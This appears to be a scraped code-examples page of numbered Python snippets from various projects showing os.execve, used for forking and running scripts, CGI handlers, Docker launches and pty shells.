    ugid = user_record[3]


    # create the script on disk
    try:
        script_path = _create_script_file(script, uid=uid, gid=ugid)
    except OSError:
        e = sys.exc_info()[1]
        return 1, "Problem creating script file:  %s" % e, extras

    # determine gid to run script as
    try:
        group_record = grp.getgrnam(groupname)
    except KeyError:
        return 1, "No such group %s" % groupname, extras

    run_as_gid = group_record[2]


    # create some pipes to communicate w/ the child process
    (pipe_read, pipe_write) = os.pipe()

    process_start = time.time()
    child_pid = os.fork()

    if not child_pid:
        # Parent doesn't write to child, so close that part
        os.close(pipe_read)

        # Redirect both stdout and stderr to the pipe
        os.dup2(pipe_write, sys.stdout.fileno())
        os.dup2(pipe_write, sys.stderr.fileno())

        # Close unnecessary file descriptors (including pipe since it's duped)
        for i in range(3, MAXFD):
            try:
                os.close(i)
            except:
                pass

        # all scripts initial working directory will be /
        # puts burden on script writer to ensure cwd is correct within the
        # script
        os.chdir('/')

        # the child process gets the desired uid/gid
        os.setgid(run_as_gid)
        groups=[g.gr_gid for g in grp.getgrall() if username in g.gr_mem or username in g.gr_name]
        os.setgroups(groups)
        os.setuid(uid)

        # give this its own process group (which happens to be equal to its
        # pid)
        os.setpgrp()

        clean_env = {"PATH": "/sbin:/bin:/usr/sbin:/usr/bin", "TERM": "xterm"}
        # Finally, exec the script
        try:
            os.umask(int("022", 8))
            os.execve(script_path, [script_path, ], clean_env)
        finally:
            # This code can be reached only when script_path can not be
            # executed as otherwise execv never returns.
            # (The umask syscall always succeeds.)
            os._exit(1)

    # Parent doesn't write to child, so close that part
    os.close(pipe_write)

    output = None
    timed_out = None

    out_stream = tempfile.TemporaryFile()

    while 1:
        select_wait = None

        if timeout:
            elapsed = time.time() - process_start

            if elapsed >= timeout:
                timed_out = 1
                # Send TERM to all processes in the child's process group
                # Send KILL after that, just to make sure the child died
                os.kill(-child_pid, signal.SIGTERM)
                time.sleep(2)
                os.kill(-child_pid, signal.SIGKILL)
                break

            select_wait = timeout - elapsed

        # XXX try-except here for interrupted system calls
        input_fds, output_fds, error_fds = select.select([pipe_read], [], [], select_wait)

        if error_fds:
            # when would this happen?
            os.close(pipe_read)
            return 1, "Fatal exceptional case", extras

        if not (pipe_read in input_fds):
            # Read timed out, should be caught in the next loop
            continue

        output = os.read(pipe_read, 4096)
        if not output:
            # End of file from the child
            break

        out_stream.write(output)

    os.close(pipe_read)

    # wait for the child to complete
    (somepid, exit_status) = os.waitpid(child_pid, 0)
    process_end = time.time()

    # Copy the output from the temporary file
    out_stream.seek(0, 0)
    extras['output'] = out_stream.read()
    out_stream.close()

    # Log script-output locally, unless we're asked not to
    if log_output :
        set_logfile(logfile_name)
        log_to_file(0, extras['output'])

    # since output can contain chars that won't make xmlrpc very happy,
    # base64 encode it...
    extras['base64enc'] = 1
    extras['output'] = base64.encodestring(extras['output'])

    extras['return_code'] = exit_status

    # calculate start and end times in db's timespace
    extras['process_start'] = db_now + (process_start - now)
    extras['process_end'] = db_now + (process_end - now)

    for key in ('process_start', 'process_end'):
        extras[key] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(extras[key]))

    # clean up the script
    os.unlink(script_path)

    if timed_out:
        return 1, "Script killed, timeout of %s seconds exceeded" % timeout, extras

    if exit_status == 0:
        return 0, "Script executed", extras

    return 1, "Script failed", extras
Ejemplo n.º 52
0
    def parseFile(self, httpd, handler):
        env = {}
        env["SERVER_SOFTWARE"] = pConfig.getValue("base.software")
        env["SERVER_NAME"] = "localhost"
        env["GATEWAY_INTERFACE"] = "CGI/1.1"

        env["SERVER_PROTOCOL"] = "HTTP/1.1"
        env["SERVER_PORT"] = pConfig.getValue("base.port")
        env["REQUEST_METHOD"] = httpd.command

        env["PATH_INFO"] = os.path.dirname(httpd.path)
        env["PATH_TRANSLATED"] = os.path.dirname(
            pConfig.getValue("base.docroot") + httpd.path)
        env["QUERY_STRING"] = httpd.query

        env["REMOTE_ADDR"] = "127.0.0.1"
        env["REMOTE_HOST"] = ""

        env["AUTH_TYPE"] = ""
        env["REMOTE_IDENT"] = ""
        env["REMOTE_USER"] = ""

        length = httpd.headers.getheader("content-length")
        if length:
            env["CONTENT_LENGTH"] = length
            env["CONTENT_TYPE"] = httpd.headers.getheader("content-type")
        else:
            env["CONTENT_LENGTH"] = ""
            env["CONTENT_TYPE"] = ""

        #env["REQUEST_TIME"]	= ""
        #env["REMOTE_PORT"]		= ""

        env["SCRIPT_NAME"] = httpd.path
        env["REQUEST_URI"] = httpd.path
        env["DOCUMENT_ROOT"] = pConfig.getValue("base.docroot")
        env["SERVER_ADMIN"] = pConfig.getValue("base.admin")
        env["SCRIPT_FILENAME"] = pConfig.getValue("base.docroot") + httpd.path

        # collect the headers additionally sent by the user
        for key in httpd.headers.keys():
            newkey = key.upper().replace("-", "_")
            if not env.has_key(newkey):
                env["HTTP_" + newkey] = httpd.headers.getheader(key)

        os.environ.update(env)

        httpd.wfile.flush()

        # fork and pipe our cgi data
        r, w = os.pipe()

        pid = os.fork()
        if pid:
            # main process
            # read the pipe
            os.close(w)
            r = os.fdopen(r)
            output = r.read()

            pid, sts = os.waitpid(pid, 0)
        else:
            # child process
            # if there is client data then pipe it
            if length:
                os.dup2(httpd.rfile.fileno(), 0)

            # create the pipes
            os.close(r)
            w = os.fdopen(w, "w")
            os.dup2(w.fileno(), 1)
            os.execve(handler,
                      [handler,
                       pConfig.getValue("base.docroot") + httpd.path],
                      os.environ)

        # if there is client data then throw away additional data
        if length:
            while select.select([httpd.rfile], [], [], 0)[0]:
                if not httpd.rfile.read(1):
                    break

        # process the php output
        status = ""
        for line in output.split("\n"):
            if line == "":
                break
            if line.startswith("Status: "):
                status = line.split(" ")[1]
                break

        # sent data to the browser
        if status:
            httpd.send_response(int(status))
        else:
            httpd.send_response(200, "Script output follows")
        httpd.wfile.write(output)
        httpd.wfile.flush()
Ejemplo n.º 53
0
    def run(args):
        config, _ = load_configs(args.conffile)

        runid = config['build']['runid']

        if use_docker(config):
            if not runid:
                print(
                    "Docker was not enabled when the environment was setup. Cannot use it now!"
                )
                return 1

            docker_path = config['config']['dockerpath']

            try:
                buildid = get_image_id(config, runid)
            except subprocess.CalledProcessError as e:
                print("Cannot verify docker image: %s\n" % e.output)
                return 1

            if buildid != config['build']['buildid']:
                sys.stderr.write(
                    "WARNING: buildid for docker image %s has changed\n" %
                    runid)

            if config['config']['buildlocal'] == '1' and config['build'][
                    'buildhash'] != get_build_hash(config):
                sys.stderr.write(
                    "WARNING: The docker image source has changed and should be rebuilt.\n"
                    "Try running: 'pyrex-rebuild'\n")

            # These are "hidden" keys in pyrex.ini that aren't publicized, and
            # are primarily used for testing. Use they at your own risk, they
            # may change
            uid = int(config['run'].get('uid', os.getuid()))
            gid = int(config['run'].get('gid', os.getgid()))
            username = config['run'].get('username') or pwd.getpwuid(
                uid).pw_name
            groupname = config['run'].get('groupname') or grp.getgrgid(
                gid).gr_name
            init_command = config['run'].get('initcommand',
                                             config['build']['initcommand'])

            command_prefix = config['run'].get('commandprefix',
                                               '').splitlines()

            docker_args = [
                docker_path,
                'run',
                '--rm',
                '-i',
                '--net=host',
                '-e',
                'PYREX_USER=%s' % username,
                '-e',
                'PYREX_UID=%d' % uid,
                '-e',
                'PYREX_GROUP=%s' % groupname,
                '-e',
                'PYREX_GID=%d' % gid,
                '-e',
                'PYREX_HOME=%s' % os.environ['HOME'],
                '-e',
                'PYREX_INIT_COMMAND=%s' % init_command,
                '-e',
                'PYREX_OEROOT=%s' % config['build']['oeroot'],
                '-e',
                'PYREX_CLEANUP_EXIT_WAIT',
                '-e',
                'PYREX_CLEANUP_LOG_FILE',
                '-e',
                'PYREX_CLEANUP_LOG_LEVEL',
                '-e',
                'PYREX_COMMAND_PREFIX=%s' % ' '.join(command_prefix),
                '-e',
                'TINI_VERBOSITY',
                '--workdir',
                os.getcwd(),
            ]

            # Run the docker image with a TTY if this script was run in a tty
            if os.isatty(1):
                docker_args.extend(
                    ['-t', '-e', 'TERM=%s' % os.environ['TERM']])

            # Configure binds
            for b in set(config['run']['bind'].split()):
                docker_args.extend(
                    ['--mount', 'type=bind,src={b},dst={b}'.format(b=b)])

            # Pass environment variables
            for e in config['run']['envvars'].split():
                docker_args.extend(['-e', e])

            # Special case: Make the user SSH authentication socket available in Docker
            if 'SSH_AUTH_SOCK' in os.environ:
                docker_args.extend([
                    '--mount',
                    'type=bind,src=%s,dst=/tmp/%s-ssh-agent-sock' %
                    (os.environ['SSH_AUTH_SOCK'], username),
                    '-e',
                    'SSH_AUTH_SOCK=/tmp/%s-ssh-agent-sock' % username,
                ])

            # Pass along BB_ENV_EXTRAWHITE and anything it has whitelisted
            if 'BB_ENV_EXTRAWHITE' in os.environ:
                docker_args.extend(['-e', 'BB_ENV_EXTRAWHITE'])
                for e in os.environ['BB_ENV_EXTRAWHITE'].split():
                    docker_args.extend(['-e', e])

            docker_args.extend(shlex.split(config['run'].get('args', '')))

            docker_args.append('--')
            docker_args.append(runid)
            docker_args.extend(args.command)

            stop_coverage()

            os.execvp(docker_args[0], docker_args)

            print("Cannot exec docker!")
            sys.exit(1)
        else:
            startup_args = [
                os.path.join(config['build']['pyrexroot'], 'docker',
                             'startup.sh')
            ]
            startup_args.extend(args.command)

            env = os.environ.copy()
            env['PYREX_INIT_COMMAND'] = config['build']['initcommand']
            env['PYREX_OEROOT'] = config['build']['oeroot']

            stop_coverage()

            os.execve(startup_args[0], startup_args, env)

            print("Cannot exec startup script")
            sys.exit(1)
Ejemplo n.º 54
0
    def execute(self) -> bool:
        if (old_dir := os.getcwd()) != self.working_directory:
            os.chdir(self.working_directory)

        # Note: If for any reason, we get a Python exception between here
        #   and until os.close(), the traceback will get locked inside
        #   stdout of the child_fd object. `os.read(self.child_fd, 8192)` is the
        #   only way to get the traceback without loosing it.
        self.pid, self.child_fd = pty.fork()
        os.chdir(old_dir)

        if not self.pid:
            try:
                os.execve(self.cmd[0], self.cmd, {
                    **os.environ,
                    **self.environment_vars
                })
            except FileNotFoundError:
                log(f"{self.cmd[0]} does not exist.",
                    level=logging.ERROR,
                    fg="red")
                self.exit_code = 1
                return False

        self.started = time.time()
        self.poll_object.register(self.child_fd, EPOLLIN | EPOLLHUP)

        return True

    def decode(self, encoding='UTF-8'):
        return self._trace_log.decode(encoding)
Ejemplo n.º 55
0
 def __call__(self):
     logging.debug('Executing %s', self.exbin)
     return os.execve(self.exbin, self.argv, self.env)
Ejemplo n.º 56
0
        args = [fsencode_w(space, w_arg) for w_arg in args_w]
    except OperationError, e:
        if not e.match(space, space.w_TypeError):
            raise
        msg = "execv() arg 2 must be an iterable of strings"
        raise OperationError(space.w_TypeError, space.wrap(str(msg)))
    #
    if w_env is None:  # when called via execv() above
        try:
            os.execv(command, args)
        except OSError, e:
            raise wrap_oserror(space, e)
    else:
        env = _env2interp(space, w_env)
        try:
            os.execve(command, args, env)
        except OSError, e:
            raise wrap_oserror(space, e)


@unwrap_spec(mode=int, path='str0')
def spawnv(space, mode, path, w_args):
    args = [space.str0_w(w_arg) for w_arg in space.unpackiterable(w_args)]
    try:
        ret = os.spawnv(mode, path, args)
    except OSError, e:
        raise wrap_oserror(space, e)
    return space.wrap(ret)


@unwrap_spec(mode=int, path='str0')
Ejemplo n.º 57
0
        if (len(process2) == 2):
            args2 = [process2[0], process2[2]]
        else:
            args2 = [process2[0]]

        os.close(r)
        w = os.fdopen(w, "w")
        print("child writing to pipe")
        fd = sys.stdout.fileno()  # os.open(outputFname, os.O_CREAT)
        os.set_inheritable(fd, True)
        os.write(2, ("Child: opened fd=%d for writing\n" % fd).encode())
        for dir in re.split(":",
                            os.environ['PATH']):  # try each directory in path
            program = "%s/%s" % (dir, args1[0])
            try:
                os.execve(program, args1, os.environ)  # try to exec program
            except FileNotFoundError:  # ...expected
                pass  # ...fail quietly

        os.write(2,
                 ("Child:    Error: Could not exec %s\n" % args[0]).encode())
        sys.exit(1)  # terminate with error

    #second process after pipe
    lc = os.fork()

    if lc < 0:
        os.write(2, ("fork failed, returning %d\n" % lc).encode())
        sys.exit(1)

    elif lc == 0:
Ejemplo n.º 58
0
        get_var_assert_set('EXHIBITOR_STATICENSEMBLE')
    ]
else:
    print("ERROR: No known exhibitor backend:", exhibitor_backend)
    sys.exit(1)

truststore_path = '/var/lib/dcos/exhibitor-tls-artifacts/truststore.jks'
clientstore_path = '/var/lib/dcos/exhibitor-tls-artifacts/clientstore.jks'
serverstore_path = '/var/lib/dcos/exhibitor-tls-artifacts/serverstore.jks'

exhibitor_env = os.environ.copy()
if os.path.exists(truststore_path) and \
   os.path.exists(clientstore_path) and \
   os.path.exists(serverstore_path):
    exhibitor_env['EXHIBITOR_TLS_TRUSTSTORE_PATH'] = truststore_path
    exhibitor_env[
        'EXHIBITOR_TLS_TRUSTSTORE_PASSWORD'] = '******'
    exhibitor_env['EXHIBITOR_TLS_CLIENT_KEYSTORE_PATH'] = clientstore_path
    exhibitor_env[
        'EXHIBITOR_TLS_CLIENT_KEYSTORE_PASSWORD'] = '******'
    exhibitor_env['EXHIBITOR_TLS_SERVER_KEYSTORE_PATH'] = serverstore_path
    exhibitor_env[
        'EXHIBITOR_TLS_SERVER_KEYSTORE_PASSWORD'] = '******'
    exhibitor_env['EXHIBITOR_TLS_REQUIRE_CLIENT_CERT'] = 'true'
    exhibitor_env['EXHIBITOR_TLS_VERIFY_PEER_CERT'] = 'true'

# Start exhibitor
print("Running exhibitor as command:", exhibitor_cmdline)
sys.stdout.flush()
os.execve('/opt/mesosphere/bin/java', exhibitor_cmdline, exhibitor_env)
Ejemplo n.º 59
0
    def run_cgi(self):
        """Execute a CGI script."""
        dir, rest = self.cgi_info
        path = dir + '/' + rest
        i = path.find('/', len(dir)+1)
        while i >= 0:
            nextdir = path[:i]
            nextrest = path[i+1:]

            scriptdir = self.translate_path(nextdir)
            if os.path.isdir(scriptdir):
                dir, rest = nextdir, nextrest
                i = path.find('/', len(dir)+1)
            else:
                break

        # find an explicit query string, if present.
        rest, _, query = rest.partition('?')

        # dissect the part after the directory name into a script name &
        # a possible additional path, to be stored in PATH_INFO.
        i = rest.find('/')
        if i >= 0:
            script, rest = rest[:i], rest[i:]
        else:
            script, rest = rest, ''

        scriptname = dir + '/' + script
        scriptfile = self.translate_path(scriptname)
        if not os.path.exists(scriptfile):
            self.send_error(
                HTTPStatus.NOT_FOUND,
                "No such CGI script (%r)" % scriptname)
            return
        if not os.path.isfile(scriptfile):
            self.send_error(
                HTTPStatus.FORBIDDEN,
                "CGI script is not a plain file (%r)" % scriptname)
            return
        ispy = self.is_python(scriptname)
        if self.have_fork or not ispy:
            if not self.is_executable(scriptfile):
                self.send_error(
                    HTTPStatus.FORBIDDEN,
                    "CGI script is not executable (%r)" % scriptname)
                return

        # Reference: http://hoohoo.ncsa.uiuc.edu/cgi/env.html
        # XXX Much of the following could be prepared ahead of time!
        env = copy.deepcopy(os.environ)
        env['SERVER_SOFTWARE'] = self.version_string()
        env['SERVER_NAME'] = self.server.server_name
        env['GATEWAY_INTERFACE'] = 'CGI/1.1'
        env['SERVER_PROTOCOL'] = self.protocol_version
        env['SERVER_PORT'] = str(self.server.server_port)
        env['REQUEST_METHOD'] = self.command
        uqrest = urllib.parse.unquote(rest)
        env['PATH_INFO'] = uqrest
        env['PATH_TRANSLATED'] = self.translate_path(uqrest)
        env['SCRIPT_NAME'] = scriptname
        if query:
            env['QUERY_STRING'] = query
        env['REMOTE_ADDR'] = self.client_address[0]
        authorization = self.headers.get("authorization")
        if authorization:
            authorization = authorization.split()
            if len(authorization) == 2:
                import base64, binascii
                env['AUTH_TYPE'] = authorization[0]
                if authorization[0].lower() == "basic":
                    try:
                        authorization = authorization[1].encode('ascii')
                        authorization = base64.decodebytes(authorization).\
                                        decode('ascii')
                    except (binascii.Error, UnicodeError):
                        pass
                    else:
                        authorization = authorization.split(':')
                        if len(authorization) == 2:
                            env['REMOTE_USER'] = authorization[0]
        # XXX REMOTE_IDENT
        if self.headers.get('content-type') is None:
            env['CONTENT_TYPE'] = self.headers.get_content_type()
        else:
            env['CONTENT_TYPE'] = self.headers['content-type']
        length = self.headers.get('content-length')
        if length:
            env['CONTENT_LENGTH'] = length
        referer = self.headers.get('referer')
        if referer:
            env['HTTP_REFERER'] = referer
        accept = []
        for line in self.headers.getallmatchingheaders('accept'):
            if line[:1] in "\t\n\r ":
                accept.append(line.strip())
            else:
                accept = accept + line[7:].split(',')
        env['HTTP_ACCEPT'] = ','.join(accept)
        ua = self.headers.get('user-agent')
        if ua:
            env['HTTP_USER_AGENT'] = ua
        co = filter(None, self.headers.get_all('cookie', []))
        cookie_str = ', '.join(co)
        if cookie_str:
            env['HTTP_COOKIE'] = cookie_str
        # XXX Other HTTP_* headers
        # Since we're setting the env in the parent, provide empty
        # values to override previously set values
        for k in ('QUERY_STRING', 'REMOTE_HOST', 'CONTENT_LENGTH',
                  'HTTP_USER_AGENT', 'HTTP_COOKIE', 'HTTP_REFERER'):
            env.setdefault(k, "")

        self.send_response(HTTPStatus.OK, "Script output follows")
        self.flush_headers()

        decoded_query = query.replace('+', ' ')

        if self.have_fork:
            # Unix -- fork as we should
            args = [script]
            if '=' not in decoded_query:
                args.append(decoded_query)
            nobody = nobody_uid()
            self.wfile.flush() # Always flush before forking
            pid = os.fork()
            if pid != 0:
                # Parent
                pid, sts = os.waitpid(pid, 0)
                # throw away additional data [see bug #427345]
                while select.select([self.rfile], [], [], 0)[0]:
                    if not self.rfile.read(1):
                        break
                if sts:
                    self.log_error("CGI script exit status %#x", sts)
                return
            # Child
            try:
                try:
                    os.setuid(nobody)
                except OSError:
                    pass
                os.dup2(self.rfile.fileno(), 0)
                os.dup2(self.wfile.fileno(), 1)
                os.execve(scriptfile, args, env)
            except:
                self.server.handle_error(self.request, self.client_address)
                os._exit(127)

        else:
            # Non-Unix -- use subprocess
            import subprocess
            cmdline = [scriptfile]
            if self.is_python(scriptfile):
                interp = sys.executable
                if interp.lower().endswith("w.exe"):
                    # On Windows, use python.exe, not pythonw.exe
                    interp = interp[:-5] + interp[-4:]
                cmdline = [interp, '-u'] + cmdline
            if '=' not in query:
                cmdline.append(query)
            self.log_message("command: %s", subprocess.list2cmdline(cmdline))
            try:
                nbytes = int(length)
            except (TypeError, ValueError):
                nbytes = 0
            p = subprocess.Popen(cmdline,
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE,
                                 env = env
                                 )
            if self.command.lower() == "post" and nbytes > 0:
                data = self.rfile.read(nbytes)
            else:
                data = None
            # throw away additional data [see bug #427345]
            while select.select([self.rfile._sock], [], [], 0)[0]:
                if not self.rfile._sock.recv(1):
                    break
            stdout, stderr = p.communicate(data)
            self.wfile.write(stdout)
            if stderr:
                self.log_error('%s', stderr)
            p.stderr.close()
            p.stdout.close()
            status = p.returncode
            if status:
                self.log_error("CGI script exit status %#x", status)
            else:
                self.log_message("CGI script exited OK")
Ejemplo n.º 60
0
    async def _create_process(self, interactive, command, size):
        if not interactive:
            proc = await asyncio.create_subprocess_shell(
                command,
                stdin=asyncio.subprocess.PIPE,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
                close_fds=True,
            )
            stdin = proc.stdin
            stdout = proc.stdout
            stderr = proc.stderr
        else:
            if sys.platform == "win32":
                if self._pty_enabled:
                    cmd = (
                        "conhost.exe",
                        "--headless",
                        "--width",
                        str(size[0]),
                        "--height",
                        str(size[1]),
                        "--",
                        command or "cmd.exe",
                    )
                else:
                    cmd = (command or "cmd.exe",)
                proc = await asyncio.create_subprocess_exec(
                    *cmd,
                    stdin=asyncio.subprocess.PIPE,
                    stdout=asyncio.subprocess.PIPE,
                    stderr=asyncio.subprocess.PIPE,
                )
                stdin = proc.stdin
                stdout = proc.stdout
                stderr = proc.stderr
            else:
                import pty

                cmdline = list(shlex.split(command or os.environ.get("SHELL", "sh")))
                exe = cmdline[0]
                if exe[0] != "/":
                    for it in os.environ["PATH"].split(":"):
                        path = os.path.join(it, exe)
                        if os.path.isfile(path):
                            exe = path
                            break

                pid, fd = pty.fork()
                if pid == 0:
                    # child process
                    sys.stdout.flush()
                    try:
                        os.execve(exe, cmdline, os.environ)
                    except Exception as e:
                        sys.stderr.write(str(e))
                else:
                    self.resize(fd, size)
                    proc = utils.Process(pid)
                    stdin = utils.AsyncFileDescriptor(fd)
                    stdout = utils.AsyncFileDescriptor(fd)
                    stderr = None
        return proc, stdin, stdout, stderr